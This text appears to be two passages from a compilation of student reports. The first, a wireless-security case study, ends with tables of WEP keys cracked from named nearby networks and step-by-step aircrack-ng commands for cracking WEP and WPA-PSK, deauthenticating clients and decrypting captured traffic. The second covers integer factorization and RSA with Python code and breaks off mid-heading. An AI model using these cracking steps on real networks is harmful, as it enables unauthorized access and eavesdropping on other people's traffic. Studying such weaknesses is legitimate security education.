The electromagnetic radiation can be picked up by person from a distance around 200
to 300 meters. However, we do not have much information about what DSO did to
protect against the susceptibility of Ethernet cables to emit electromagnetic radiation.
DSO may have employed several ways to safeguard them from TEMPEST. First,
unauthorized individuals should not have access to the building. This means that these
unauthorized individuals do not have the mean to get close to the source where
electromagnetic radiation is emitted. Secondly, the wall of the department may be
constructed in a way to block unintentional emissions out of the particular
department. Other ways such as filtering and shielding of the communication devices
can be executed for EM isolation [10].
As mentioned earlier, a wide spectrum of technologies are employed in
government’s institutes. Hence, DSO is also using centrally administered desktop
firewall (CAFÉ) and provided 24x7 network surveillance technology and service.
4
Security in Enterprises
In the office environment employee would handle different type of files everyday and
certain file are only accessible to higher up management only. Therefore different
enterprise would have a different set of rules and regulations on their security policy.
In addition different enterprise might employ different network setting and different
wireless encryptions. In this section we would review the security environment of
two firms which is the United Test and Assembly Center Ltd (UTAC) and the English
Corners. We would review the policy of the 2 firms and do a comparison of these two
different companies one mainly which is a relatively large company and the other is
just a small enterprise of less the 10 employee.
4.1
Case Study in English Corners (Singapore Firm)
Another case we review is on a small company name English Corners which sell their
own books and educational toys to primary school kids and parents. In this section we
would look at the various policy and security measures they have in a small
enterprise.
First the office has an open concept policy which means that customers could just
walk-in to the company to purchase items and they would be able to get in contact
with all the staff and computers. Therefore to protect our workstation from being view
or used by other our work stations are protected with passwords and employees are
requires to login via the assign password and user ID given. In addition they have a
rule that an employee have to attend to the customers before the customers get close
to their work station. While attending to the customers, they are required to logoff
their workstation. This would prevent other users from using it.
In this case of a small enterprise, it uses wireless connection via router for internet
access. The password for the wireless network is only known to the higher
60
management personnel. However there’s a flaw here as the computer which has
access to the router was not properly secure. Interns of the company are required to
open the company and start up the company systems every morning. Therefore all
intern allocated to starting up the system will know the password to the network. In
addition, due to the fact that the company is a small enterprise, the company does not
have any IT support department. All the networking and website of the company are
done by the Boss son.
Therefore the security of our network was of bare minimum protection which is the
Wired Equivalent Privacy (WEP) which is mention above in section 2 home
environment. In compare with home environment, office environment would have
more users on the wireless network while home environment would have one or two
users. This would make the office users more vulnerable over the wireless network
while compare to home environment. English Corners has low security on file
protection, this is due to the fact that being a small company we do not have intranet
to pass our files to one and other. Therefore all transfer of file was done via sending it
through a thumb drive. This would allow all personal in the office to have access to
all sort of files within the thumb drive. This total lack of security allow even us
interns to view lots of different files i.e the customers database excel file, all
customers confidential credit card number and many others. There is totally no file
control and all employees could easily read or modify the file within the thumb drive.
In addition there was no policy of not being able to use personal thumb drive to copy
out document and finishing the work at home.
In conclusion the company which one of our researcher work in has limited and
low security due to the fact that they might not understand the importance of
protecting their data as they do not have a IT department which would follow up or
set up a set of rules. They should have set up policy of no usage of external storage
device and set up an intranet for the worker to share their documents and have a file
policy of who would have access to what sort of information.
4.2
Case Study in United Test and Assembly Center Ltd
A case study we have done is on a high tech manufacturing firm, United Test and
Assembly Center Ltd (UTAC), which produces chips such as the SIM card used in
mobile phones. They have reasonable security policies in place to protect the designs
and technologies used in their manufacturing processes.
To go pass the reception area, employees have to scan their employee pass through
a sensor in order to open a door. Within the building itself, employees have to do
more scanning of pass to get to where they need to go. This is because the building is
divided into many areas. These areas generally fall under one of four areas:
manufacturing, research and development (R&D), general administration and
management information system (MIS) aka the IT department. Each area is divided
by doors which require an employee to scan his pass in order to open the door. Hence
UTAC managed to control the areas which an employee can access through the use of
different level of pass. This is similar to the scenario described in our DSO case
study.
61
For visitors, they need to exchange a pass if they are staying for a long period of
time (eg: more than a day). If not, they must be accompanied by an employee who is
required to bring them in and then stay with them at all times during their stay.
Everyone who wants to exit the building have to go through a metal scanner under the
watchful eyes of at least one security guard. This is to prevent the chips which are
being manufactured to be taken out and leaked to their competitors.
However, unlike in DSO, UTAC have wireless connection within the building.
WPA is used as the form of encryption for their wireless connection. Furthermore, the
username and password to the wireless connection is not known to all employees. It is
given out on a need to know basis. Also, the username used to access the network is
linked to their company profile, hence their rights to the internet is limited to what is
given to them through their individual company profile. This point will be further
discussed below. Although it appears that thoughts have been given to wireless
security, UTAC have a second wireless connection for visitors. This second network
does not have encryption. The username and password are also freely given out. Add
on the face that there is totally no restriction for users on what they can do using this
network and it looks like the wireless security of UTAC is very easily compromised.
However, one can’t help but wonders if this network is deliberately set up in such a
manner so as to allow visitors to easily access the internet and in actual fact, security
measures such as separating this network from the company network via demilitarized
zone (DMZ) are in place. What exactly has or has not been done regarding this
second wireless network has not been disclosed to us.
As earlier mentioned, each employee has an individual profile in the company
network. This is to control access to files and folders on the company network. Each
department has a shared virtual drive to save their work. The profile of an individual
will determine which files he has access to. Internet access are also based on this
profile with most employees having no internet access at all, some having limited
access to view limited websites and only a few have full internet access.
Desktop security is another aspect which to take note of. UTAC has a centralized
firewall using Symantec software running on every PC in the building. This software
is centrally administrated on a server and updates are passed on to the PCs every
night. In addition, the Symantec software is also used to prevent the use of thumb
drive and other storage devices on the PC.
Lastly, UTAC has a policy of no thumb drive and external storage devices to be
carried in and out of UTAC premises. Exceptions can be made by requesting to the IT
department and upon approval; a sticker will be given to be pasted on the approved
device. Laptops are subjected to the same policy. This policy is also upheld by the
metal scanner which everyone has to pass to exit the building. The security guard will
also request to look into the bags of all who exits the building.
4.3
Comparison of firms
As we can view from the above two cases there are several differences in the security
policy. The first is that one firm‘s employee are allow to use external storage devices
62
while the other don’t. This is due to the differentness in company structure and the
available of intranet in UTAC while not in English Corners. Employee of UTAC
would be able to transfer their files within the organization while English Corners’
have to rely on the use of thumb drive or email to transfer or share files. The policy of
not using external hard drive is to prevent employee from stealing information out of
the company. Therefore from this point we could see that UTAC have a higher
security policy over English Corners over the protection of their data. In addition
English Corner allows all employees to have access to all file and the ability to make
changes to them. Whereas in UTAC, employees are only allows to views the level of
documents according to their profile level.
5
Compare and Contrast of the various environments
In view of our research, we could see the deployment of different security level policy
in the three different environments namely the Government, Office and the Home
environment. As reviewed the government requires the highest security environment
due to the nature of the data it contained and handled. Office and home environment
on the other hand are less secured due to its nature, technical knowledge of
individuals and the support given.
Government environment uses wired connection despite the availability of the
new wireless technology because the technology still contain vulnerability that could
be exploited and so wired network are used to prevent unauthorized personnel from
intercepting packets transmitting over the air which can be done easily in the case of
wireless connection. However, wired connection used by Singapore government’s
institute emit electromagnetic radiation. Further prevention measures are taken to
prevent the tapping of wired cable such as more surveillance cameras are installed to
look out for suspicious activities.
In general, both office and government environment have security guard in the
compound to conduct check on employee and visitor to screen out suspicious or
unauthorized items being brought into the area. However, most companies allow
employees to bring camera phone with the exception of Government agencies such as
Mindef and DSO where their employees are prohibited from bringing camera phone.
Failure to comply with the camera phone ban will result in severe punishment in
Mindef and DSO. For example, an intern from DSO caught with a camera phone may
get dismissed from DSO as punishment or employee from Mindef related institute
such as SAF will get charge in martial court for bringing camera phone.
In contrary to home environment, wireless network are enable in individual home
because most of their modem and router that came in a bundle when they signed
network contract with the network providers and these modem and router usually
have wireless capability and are turn on on default. Moreover, enable wireless could
means more convenient to access Internet anywhere in the home and also could reach
to more users. The security of different individuals in home environment varies due to
their technological knowledge. However, many of the home users uses the default
security setting to protect their wireless network. For older router and modem, the
63
default security setting is WEP, which has flawed and already broken so anyone will
be able to break into these home networks easily.
6
Limitations
During our research we face certain limitations. One limitation would be the lack of
information that we can gathered over the Internet for the Government environment.
The only information we got for our case study (DSO) is provided by one of our
authors who managed to work in the government institute as an intern. However, we
are still quite restricted in the information we can get from DSO since the privilege or
access permission given to the intern is only restricted to the project assigned to them.
Hence, the information gathered from the intern may only be the tip of the iceberg
where there might more security measures being employed that we might not
discover. In addition, interns are required to sign a non-disclosure agreement where
they will not disclose confidential information about the project and the structure and
layout of the building they are working in. Therefore, this will limit in the scope of
what we could write in the report.
Another limitation we face during our research on the home environment would be
that we are required to be stationed near the targeted network to prevent packets lost
and deter us from sniffing for network vulnerability. Therefore we would require
multiple Access Points to be available near the vicinity in order for cracking.
In addition there is a limitation to the dictionary attack we perform in cracking the
passwords as we do not have a supercomputer that can handle the generation of
possible results quickly we are only able to crack only those more commonly use
English words or known passwords which are relatively short.
7
Conclusion
From our research, the government has adopted more comprehensive and restrictive
policies, standards and procedures for ensuring it maintains a secured infrastructure
for transmitting sensitive information. The security around government’s institute is
generally adequate, but it may seem too rigid in certain measures which may result in
inconvenient and unhappiness among employees.
The office environment employ different standard of security policy between
different firms. Some companies would have a higher security policy. For example,
wireless network security at office such as English Corner may not be adequate. As
such, improvements in some areas are needed like a more enhanced policies and
standards in wireless networking, strengthening some of the management and
monitoring of wireless operating activities, as well as using WPA as their security key
for wireless connection. In addition we would suggest the use of intranet for the
sharing of files and have files access level to prevent unauthorized access of
confidential files.
The default security key uses in the home environment should be change to WPA
so as to allow individuals to enjoy a higher secure network in their home. ISP should
64
step in and aid to help their customers to either guide them in changing to a higher
setting of WPA instead of WEP on existing ones or pursue them to upgrade to a
newer router or modem. Moreover, ISP should also help their customers in securing
the administrator page to a better protection mechanism in these devices to future
deter intrusion. This would allow less IT savvy users to enjoy higher protection while
using wireless network within their home environment.
References
1) Robert,J,B.(2002).Wireless Security: An Overview. Retrieved 30 October, 2011, from
http://www.washburn.edu/faculty/boncella/WIRELESS-SECURITY.pdf
2) Nikita,B, Ian, G. David, W. Intercepting Mobile Communications: The Insecurity of
802.11.(n.d.) Retrieved 30October, 2011 from
http://www.isaac.cs.berkeley.edu/isaac/mobicom.pdf
3) Aircrack-ng Retrieved from http://www.aircrack-ng.org/
4) Infocomm Development Authority Of Singapore. (2006). Singapore: A World Class eGovernment. Retrieved 30 October, 2011, from
http://www.ida.gov.sg/doc/Infocomm%20Industry/Infocomm_Industry_Level1/Gov%20Bro
chure.pdf
5) Lee,M,K.(2007, July 27).Malaysian Govt bans camera phones. Retrieved 30 October,2011
from http://www.zdnetasia.com/malaysian-govt-bans-camera-phones-62029540.htm
6) Munir,K. (2003, September 13). Jamming device aim at camera phones. Retrieved 30
October,2011 from http://www.zdnetasia.com/jamming-device-aims-at-camera-phones39150860.htm
7) Bob,B. (2008, November 21). Defense bans use of removable storage devices.Retrieved 30
October,2011 from http://www.nextgov.com/nextgov/ng_20081121_2238.php
8) Joanne,R. (2008, May 15). Wired vs Wireless: Sometimes There’s no Substitute for a Cable.
Retrieved 30 October, 2011 from
http://www.osnews.com/story/19748/Wired_vs_Wireless_Sometimes_There_s_No_Substitu
te_for_a_Cable/page2/Asd
9) Borys,P. (2001, February). Tempest. Retrieved 30 October from
http://searchsecurity.techtarget.com/definition/Tempest
10) U.S. Army Corp of engineers, Publication Department. (1990, December
31).Electromagnetic Pulse (EMP) and Tempest Protection for Facilities. Retrieved 30
October, 2011 from http://cryptome.org/emp08.htm
65
Appendix A
Table 1 – Found keys of WEP network
BSSID
ESSID
CHANNEL
KEY FOUND
00:1A:70:95:6A:C6
ruiqi
11
18:06:19:81:88
00:C0:CA:1D:51:D4
WLAN-11g-AP
1
64:69:76:65:72
00:1F:B3:63:46:89
2WIRE092
6
21:53:38:13:27
00:16:B6:33:9A:B0
hairi
6
93:80:83:14:00
00:23:51:AB:40:71
2WIRE687
6
84:39:27:86:29
Table 2 – Detailed step for cracking WEP Wireless Network
Steps
1
Function
Enable wifi monitor mode
Commands
sudo airmon-ng start wlan1
2
Start network sniffing to
select target AP.
sudo airodump-ng mon0
3
Monitor specific network
sudo airodump-ng -c <CHANNEL> --bssid <MAC
ADDRESS> -w <FILE-NAME> mon0
4
Fake
Authentication
(Optional, if there is no
available
host
connecting to AP)
sudo aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a
<BSSID> -h <fake BSSID> --ignore-negativeone mon0
5
ARP REQUEST REPLY
ATTACK
sudo aireplay-ng -3 -b <BSSID> -h<HOST / FAKE
BSSIB> --ignore-negative-one mon0
6
Retrieved passphrase from
the IV collected
sudo aircrack-ng -b 00:1A:70:95:6A:C6 ruqi-01.cap
7
(Decrypting and viewing
the
whole
network
exchange with AP)
sudo airdecap-ng -w <passphrase key> <captured
network file name, e.g.:“2WIRE687-01.cap”>
(decrypting)
sudo tcpdump -r <decrypted network file name> -i
mon0 (viewing)
Table 3 – Detailed step for cracking (WPA/WPA2) - PSK Wireless Network
Steps
1
Function
Enable wifi monitor mode
Commands
sudo airmon-ng start wlan1
66
2
Start network sniffing to select target AP.
sudo airodump-ng mon0
3
Collect authentication 4-ways handshake
for the targeted AP
sudo airodump-ng -c 6 --bssid
<BSSID> -w <file name to be
save> mon0
4
client who is already connected to the AP
sudo aireplay-ng -0 500 -a <AP MAC
ADDRESS> -c <Client MAC
ADDRESS> --ignore-negative-one
mon0
5
Check if the handshake is being captured
sudo aircrack-ng <file name>
6
Dictionary Attack on the handshake
captured file
sudo aircrack-ng -w password.lst -b
<AP MAC ADDRESS>
<file
name>
Appendix B
Figure 1 – List of available wireless network (Location A)
67
Figure 2 – List of available wireless network (Location B)
Figure 3 – Aircrack-ng on WEP for ruiqi Network
68
Figure 4 – Plain texts (Decrypted) packets for ruiqi Network
Figure 5 – Aircrack-ng on WEP for WLAN-11g-AP Network
69
Figure 6 – Aircrack-ng on WEP for 2WIRE092 Network
Figure 7 – Aircrack-ng on WEP for 2WIRE687 Network
70
Figure 8 – Aircrack-ng on WEP for hairi Network
Figure 9 – Plain texts (Decrypted) packets for hairi Network
71
Figure 10 – WPA-PSK 4-way handshake monitoring for Remyidah network
Figure 11 – Dictionary attack on the obtained handshake for Remyidah Network
72
Figure 12 – WPA-PSK 4-way handshake and Dictionary attack for Linksys network
Figure 13 – Router homepage for 2WIRE687 network
73
Figure 14 – Router homepage for hairi network
Figure 15 – Router’s firewall for hairi network
74
Appendix C
Figure 16 – Survey Respond 1
75
Figure 17 – Survey Respond 2
76
Figure 18 – Survey Respond 3
77
Figure 19 – Survey Respond 4
78
Figure 20 – Survey Respond 5
79
Figure 21 – Survey Respond 6
80
Figure 22 – Survey Respond 7
81
Figure 23 – Survey Respond 8
82
Figure 24 – Survey Respond 9
83
Figure 25 – Survey Respond 10
84
Figure 26 – Survey Respond 11
85
Figure 27 – Survey Respond 12
86
Figure 28 – Survey Respond 13
87
Figure 29 – Survey Respond 14
88
Figure 30 – Survey Respond 15
89
Figure 31 – Survey Respond 16
90
Figure 32 – Survey Respond 17
91
Figure 33 – Survey Result 1
Figure 34 – Survey Result 2
92
Figure 35 – Survey Result 3
Figure 36 – Survey Result 4
93
Figure 37 – Survey Result 5
94
Integer Factorization
Romain Edelmann [email protected],
Jean Gauthier [email protected], and
Fabien Schmitt [email protected]
École Polytechnique Fédérale de Lausanne
Abstract. In this report, we discuss about the factorization of integers,
a major problem closely related to cryptography and arithmetic, starting with a brief history of the subject, and mathematical background.
Then we will discuss the motivation behind factorizing numbers. The
problem is then analyzed within complexity theory in terms of feasibility and complexity. Various algorithms are then presented and some
implemented using Python.
Keywords. Integer factorization, prime factors, cryptography, public
key systems, RSA, complexity theory, algorithm, Fermat’s factorization
method, Pollard’s factorization method, Shor’s algorithm.
1
Introduction
Integer factorization is the decomposition of a number into its prime divisors.
As we shall see all along this report, this problem is very important in a number
of fields, including cryptography. The problem might seem easy to solve at first,
but in fact it gets much harder as numbers get big.
2
History
Integer factorization and prime numbers are closely related subjects and have
been studied for a very long time. [1]
In Ancient Greece already, Euclid studied prime numbers and demonstrated
some of their fundamental laws, such as the infinitude of primes and the fundamental theorem of arithmetic. Prime numbers were also taught in the Pythagoras’s school, and Eratosthenes tried to find some of their principles.
Later, in 1640, Pierre de Fermat, a French mathematician developed his Fermat’s little theorem, however without proving it. Less than hundreds years later,
Leibniz and Euler proved it. Euler also developed many functions and theorem
in Number Theory, such as Euler’s totient theorem, which is the generalization
of the Fermat’s little theorem.
Finding the prime numbers remained hard, but at the beginning of the 19th
century, Gauss found a formula to show that the density of the prime numbers is
95
asymptotic. Other mathematicians tried to create some tests to define if an integer is prime or not, including Lucas who created his test in 1876 and found the
greatest prime number found without a computer. His test would be improved
by Lehmer in 1930 and is still in use nowadays.
In the 1970’s, with the expansion of the networks, scientists finally found a
practical application for prime numbers : the public key cryptography. Until that
day all the encryption were symmetric. In 1976, Diffie and Hellman invented the
first public key encryption, followed by Ronald Rivest, Adi Shamir and Leonard
Adleman, who invented in 1978 a new public key crypto-system, named after
them, RSA. Based on prime numbers properties and factorization, RSA is still
widely used nowadays. [2]
3
Important Mathematical Properties
Before proceeding to the rest of the report, it is important to see some of the very
important mathematical properties used in integer factorization. This section
reviews theorems and definitions that are used throughout this paper. Since
the vast majority of the subsequent propositions are well-known results from
basic algebra and number theory that can be found in any good algebra or
mathematics book[3][4], the proofs have not been included in this section. The
theorems are hence formulated as propositions.
Definition 1. If a and b are integers, a 6= 0, then a divides b, if there is an
integer c such that a · c = b. This is written as a|b. In this case, a is a factor of
b and b a multiple of a. If a does not divide b, we write a 6 | b.
Definition 2. A positive integer n greater than 1 is called prime if the only
positive factors of p are 1 and p.
Definition 3. If a positive integer greater than 1 is not prime, it is called composite.
Definition 4. The largest integer g such that g|m and g|n, where m and n are
both nonzero, is called greatest common divisor of m and n and is denoted
by gcd(m, n).
Definition 5. If a number m is such that gcd(m, n) = 1 for a given n, then m
is said to be coprime or relatively prime to n.
Proposition 1 (Fundamental Theorem of Arithmetic). Every positive integer greater than 1 can be written as a prime or a product of primes in a unique
way, up to the order of its factors.
Proposition 2. √
Let n be a composite integer. Then n has a prime divisor less
than or equal to n.
Definition 6. Two integers a and b are congruent modulo n if n|(a − b).
Formally, this is written as a ≡ b mod n. If a and b are not congruent modulo
n, we write a 6≡ b mod n.
96
Definition 7. An integer a−1 which satisfies the congruence relation a · a−1 ≡
1 mod m is called modular multiplicative inverse modulo m or simply the
inverse of a. a−1 exists if and only if gcd(a, m) = 1.
Proposition 3 (Bézout’s identity). For every nonzero integers a and b, there
exists two integers x and y such that:
ax + by = gcd(a, b).
(1)
Proposition 4 (Euclidean algorithm). After the following steps, rk+1 is
gcd(a, b) :
r0 := a, r1 := b
(2)
r0 = q0 · r1 + r2
(3)
r1 = q1 · r2 + r3
(4)
...
rk−1 = qk−1 · rk + rk+1
(5)
rk = qk · rk+1
(6)
Proposition 5 (Extended Euclidean Algorithm). The following substitutions solve Bézout’s identity, according to the computations done in Euclid’s
algorithm. Furthermore, x is the multiplicative inverse of a mod b:
rk+1 = rk−1 − qk−1 · rk
(7)
rk+1 = rk−1 − qk−1 · (rk−2 − qk−2 · rk−1 )
(8)
rk+1 = −qk−1 · rk−2 + rk−1 · (1 + qk−1 · qk−2 · rk−1 )
(9)
...
rk+1 = x · a + y · b
(10)
At each step, the ri with the highest index on the right-hand side of the equation
is substituted by using the equation ri−2 = qi−2 · ri−1 + ri . The computation is
stopped when rk+1 is expressed in terms of a linear combination of a and b.
Definition 8 (Eulers Phi Function). The function ϕ(n) which is defined as
being the number of positive integers less than or equal to n that are coprime to
n is called the totient or Euler’s phi function of n.
ϕ(n) = n
Y
1
(1 − )
p
p|n
where p are all the prime factors of n.
Corollary 1. If p and q are primes, then ϕ(p · q) = (p − 1) · (q − 1).
97
(11)
Proposition 6 (Fermat’s little theorem). If p is prime, then for any integer
a, we have ap ≡ a mod p. Alternatively, if gcd(a, p) = 1, then ap−1 ≡ 1 mod p.
Proposition 7 (Euler’s theorem). If n and a are coprime integers, then
aϕ(n) ≡ 1 mod n. This theorem is a generalization of Fermat’s little theorem.
Proposition 8. Every odd integer can be written as a difference of two perfect
l−m 2
2
squares. Furthermore, if lm is a factorization of n, then n = [ l+m
2 ] − [ 2 ] is
such a difference.
4
Motivation
The prime factorization is widely used in the scientific world : in cryptography,
of course, but also in algorithmic and in image processing. Every number has
a unique prime factorization. Having two or more numbers, and knowing their
prime factors allows to discover quickly their greatest common divisor, least
common multiple or square root. Based on this property, many researches are
still in progress to find the prime factorization faster. [5]
4.1
Cryptography
Factorization of Large Integers If we have two big prime numbers, it’s really
easy to obtain their product. But from this product, it’s reasonably impossible
to find its prime factorization[6]. This problem is the base of the actual public
key cryptography[7], widely use in the network security.
Public Key Cryptography The main principle of public key cryptography
is to create a function that is easily computable but hardly invertible. So the
persons who want to send you a secret message can encrypt it with your public
key, which is accessible by everyone on the network. But without the private key,
that remains secret for anybody but you, it’s almost impossible to decrypt the
message. [7]
The Example of RSA (Rivest Shamir Adleman) In cryptography, one of
the widely used system in the Internet is the RSA crypto-system[7]. This public
key crypto-system is based on the difficulty of finding the two prime factors of a
huge number. Let’s take the case of Bob who wants to send a message to Alice,
without anyone but Alice being able to read that message. First of all, let us see
how Alice does create her public and private keys.
– Alice chooses two big prime numbers, p and q that she keeps private. Then
she can compute their product n = p ∗ q.
98
– Alice now computes the Euler’s phi function of n.
ϕ(n) = (p − 1) · (q − 1)
(12)
One of the key things to understand, is that Alice can very easily calculate
this function, because, in contrary to anybody else, she knows p and q, the
prime factors of n.
– Then Alice chooses a number e relatively prime to ϕ(n) and calculate its
inverse d modulo ϕ(n).
d ≡ e−1 mod ϕ(n)
(13)
In order to compute this d, Alice can use the Extended Euclidean Algorithm.
– Alice now publishes the pair (n, e) as a public key, and keeps d secret.
If Bob wants to send confidentially a message M to Alice, he can use the
public key of Alice in order to perform the following computation:
E ≡ M e mod n
(14)
and then send the computed cypher-text E to Alice. When she receives the
cyphertext, Alice can retrieve the original message performing the following computation:
M ≡ E d mod n
(15)
The fact that M is recovered from this computation follows from Euler’s
Theorem.
Attack Using Integer Factorization Let now imagine that a hacker, named
Trudy, was able to read the encrypted messages from Bob to Alice. What Trudy
knows is the following:
– The public key of Alice, that is to say n and e.
– The cypher-text E.
The only thing that prevents Trudy from decrypting the cypher-text is that
she is not able to compute the Euler’s phi function of n. If a fast way to decompose n into its prime factors p and q was known by Trudy, she could very
easily compute ϕ(n) and d using exactly the same way Alice used herself, and
therefore be able to decrypt E to the original message M . Here lies the principal
motivation behind integer factorization.
5
Theoretical Computer Science Approach
In order to analyze integer factorization more formally in terms of feasibility
and complexity, we will need to introduce briefly the theory of complexity. This
section is intended as a very short introduction to this theory. It is a wide area
of study and readers interested in the subject can refer to various authoritative
books, like Introduction to the Theory of Computation by M. Sipser [8], which
is the reference book used throughout this chapter.
99
5.1
Complexity Theory
Complexity theory is an area of the theory of computation. The theory is about
classifying problems according to the difficulty to compute a solution for them.
Some problems are easy, like sorting a list of integers, and some are hard, like
deciding whether or not the free variables in a boolean formula can be assigned
such that the formula evaluates to true.
Complexity theory plays a central role in modern cryptography. Many codes
nowadays rely on the computational difficulty of decrypting a cipher without the
key.
The following subsections are a short introduction to the complexity theory.
5.2
Problems
A problem can be described formally as a question in some formal language
about some input. A kind of problems, which are easier to reason about, are
the decision problems. The answer to a decision problem given a certain input
is always Y ES or N O. For example, the question ”Is n prime?” with n an input
number, is a decision problem called P RIM E. Another kind of problems, the
functions problems have not their output limited to Y ES or N O.
5.3
Turing Machines
A Turing machine is an abstract model of a computer first introduced by Alan
Turing in 1936. Anything that a computer can compute, so can a Turing machine.
It consists of an infinite tape as memory and a read-write head moving left or
right on the tape.
In order to control this, this abstract machine has a finite number of states
and a transition function, which, given a state and the symbol under the head,
will return three instructions: a new state, a symbol to replace the read symbol
with on the tape and where to move the head, left or right.
The machine contains three special states. The first one is an initial state,
which is, unsurprisingly, the state on which the machine starts.
The two others are an accepting state and a rejecting state. In both cases,
when the machine reaches one of these states, it stops.
The input given to the machine is placed on the tape before any computation
is made.
Textual Description of Turing Machines. Giving such precise description
of a Turing machine is unwieldy, due to all the details. For the rest of the report,
we will give only a higher-level text description of what the Turing machine does,
when we need to describe one. Given a description, it is possible to convert it to
the formal description we’ve just described.
100
Language of a Turing Machine. The language of a Turing machine is defined
as the set of all inputs on which the machine will accept, that is to say all the
strings of symbols which would lead the Turing machine to the accepting state.
Non-deterministic Turing Machines. A non-deterministic Turing machine
is much like a normal Turing machine, except for the transition function. Instead of just giving on set of the three instructions (new state, new symbol and
direction), it can give many of them. The machine can be seen as making the
non-deterministic choice of which one to execute in order to, if possible, go to
the accepting state.
5.4
Complexity Classes
The complexity classes are a way to classify problems in terms of difficulty of
computation. In order to classify a problem, one need to find a corresponding
Turing machine whose language is the set of solutions to the problem, encoded in
some alphabet. If we take a look at the P RIM E problem, we can find a Turing
Machine, that we will call P rime, that will accept for instance all the binary
representations of prime numbers.
The P Class. Two very important classes in practice are the famous P and
N P classes. A problem is in P if it is possible to find a Turing machine that will
accept all the solutions to the problem and reject all the others, in polynomial
time. By polynomial time, it is meant that the time of computation is bounded
by a polynomial depending on the size of the input.
Intuitively, the problems feasibly computable on a computer are part of P ,
like for instance sorting a list of integer or getting the greatest common divisor
of two numbers. This is known as the Cobham thesis. [9]
The problem of deciding if a number is prime has been proven to be in P in
2004.[10]
The N P Class. The N P class is the same as the P , except that the deterministic Turing Machines are replaced by non-deterministic ones. All problems
in P are also naturally within N P . It is not known if there exists problems that
are in N P but not in P , this is the famous question of P = N P .
One can prove that a problem is in N P by verifying a given certificate along
with the input. We will use that method later on to prove that the factorization
problem is in N P .
N P - Complete Problems. A certain subset of N P is known as the N P complete problems. A Turing machine solving a N P - complete problem can be
reduced to another Turing machine of equivalent complexity solving any given
N P problem. That means that if one can find a Turing machine, or an algorithm,
that solve any of the N P -complete problem in polynomial time, we can find a
feasible way to compute any of the N P - problem.
101
5.5
The Integer Factorization Problems
The integer factorization can be stated as a function problem, meaning that
given any integer, a unique output, the list of prime factors, is expected.
But this problem is equivalent to the following decision problem: Given two
integers, n and k, is there an integer m such that 1 < m < k and m divides n.
5.6
Integer Factorisation in N P
The integer factorization problem falls in N P , the class of problems solved in
polynomial time by a non-deterministic Turing machine. As stated earlier, a
problem is in N P if and only if a certificate, or solution, can be verified in
polynomial time on a deterministic Turing machine. This is the fact used in the
following proof.
It is also important to keep in mind that the complexity is calculated from
the input length. If a number n is to be passed to the machine, it first needs to
be encoded in a given alphabet. The size of the input is of the order of log(n)
for a number n.
Proof. For the proof, we will simply define a Turing machine that verifies a
solution of the factorization of n, p1 to pk being the supposed prime factors of
n.
FactorVerifier(<n, p1 , p2 .. pk >)
Begin
acc := 1
For f := p1 , p2 .. pk :
If Prime(f) rejects, REJECT
acc := acc * f
If acc = n :
ACCEPT
Else :
REJECT
End
End
This deterministic Turing machine verifies in polynomial time that n is indeed
the product of the primes p1 to pk. This Turing machine uses an other Turing
machine, P rime, in order to test in polynomial time if a number is prime. As
stated earlier, P RIM E is in P .
5.7
Relation to Other Complexity Classes
It is widely believed that this problem is not N P - complete. However, no proof
of this fact has been done so far. It is closely related to the P = N P question,
which has never been proven or disproven.
102
As a N P problem, we don’t know if it is possible to have a polynomial
time algorithm to solve integer factorization. But finding a polynomial time
algorithm that solve any of the N P - complete problem would mean that integer
factorization is also feasible in polynomial time and would compromise greatly
the security of public key cryptography systems !
6
6.1
Algorithms for Integer Factorization
Big O Notation
When discussing about complexity of algorithms, we will use the Landau notation, known as the Big O notation.
f (n) ∈ O(g(n)) ⇐⇒ ∃k > 0, m ∈ N(∀n > m ∈ N(f (n) ≤ g(n) · k))
(16)
What it means is that if f (n) ∈ O(g(n)) then f (n) does not grow faster than
g(n). In other words, f (n) is bounded by g(n).
6.2
Trivial Factorization Algorithm
Core Ideas. This algorithm is the most naive method to factorize an integer n
into a product of primes. What is done is starting at i = 2, and seeing
√ whether
i|n. If yes, we repeat this step. If no, we increment i until it reaches b nc. This
algorithm is deterministic and proves whether n is prime or not: if the only
returned factor is n, then n is prime. Otherwise, n is composite and the list of
its factors is returned.
Implementation in Python.
def trivialFactorization(n):
factors = []
ncurr = n
for i in range(2, floor(sqrt(n))):
while ( ncurr % i == 0 ):
factors.append(i)
ncurr/=i
factors.append(int(ncurr))
return factors
103
√
Running Time. In the √
worst case, the only factors of n are n. Hence, √
the
algorithm will perform O( n) modulos (divisions) since every integer up to n
is tested. Each division can be √
performed in O(log(n)) [11]. This leads to the
overall worst-case complexity O( nlog(n)). When considering the number of bits
m of n, the running time is O(m · em/2 ). While this running time is acceptable
for small numbers or integers with small factors, the algorithm becomes totally
impractical when trying to factor a large number with large prime factors.
√
Improvements. There is no need to check every integer up to O( n). A first
improvement would be to leave out all even numbers after having repeatedly
divided n by 2. We can further improve the algorithm by using Eratosthenes’
sieve, since we need only consider prime factors.
6.3
Fermat’s Factorization Algorithm
Core Ideas. Fermat’s Factorization is based on the fact that every odd integer
can be written as a difference of two perfect squares. The algorithm starts by
factoring out all factors equal to 2. Then, an odd integer is left for factoring
and Fermat’s method
can be applied. The algorithm cycles through values for
√
x, starting at d ne, and checks whether x2 − n = y 2 is a square. If it is the case,
two factors of n have been found out, namely x + y and x − y. By applying this
method recursively to the two factors, the decomposition of n into a product of
primes can be achieved.
Implementation in Python.
def fermatFactorization(n):
def fermatFactor(n):
x = ceil(sqrt(n))
y2 = x**2 - n
while round(sqrt(y2))**2 != y2:
x+=1
y2 = x**2 - n
return int(x - sqrt(y2))
factors = []
while n % 2 == 0:
factors.append(2)
n/=2
cfactor = fermatFactor(n)
104
if cfactor != 1:
factors.extend(fermatFactorization(cfactor))
factors.extend(fermatFactorization(n/cfactor))
else:
factors.append(int(n))
return factors
Running Time.
Fermat’s method is very effective when the factors to be found
√
are close to n. In the worst case however, when√n is prime, the algorithm is
even worse than the trivial algorithm, since O(n − n) = O(n) steps are needed.
Expressed in terms of n’s size in bits m, the running time is O(2m ).
Improvements. There are several simple improvements that can be added to
the algorithm, in order to reduce its running time. The most straight-forward
one combines
Fermat’s algorithm with
√ the trivial method. It sets a threshold
√
t > n, uses Fermat’s method on d ne ≤ x ≤ t. and the trivial algorithm
afterwards, knowing that only factors small than x − y have to be tested. Other
improvements include a sieve-method where not all x’s are tried out in the
equation x2 − n = y 2 .[12]. Fermat’s factorization method has been used as a
basis for modern factorization algorithms, such as the quadratic sieve and the
general number field sieve.
6.4
Pollard’s % Algorithm
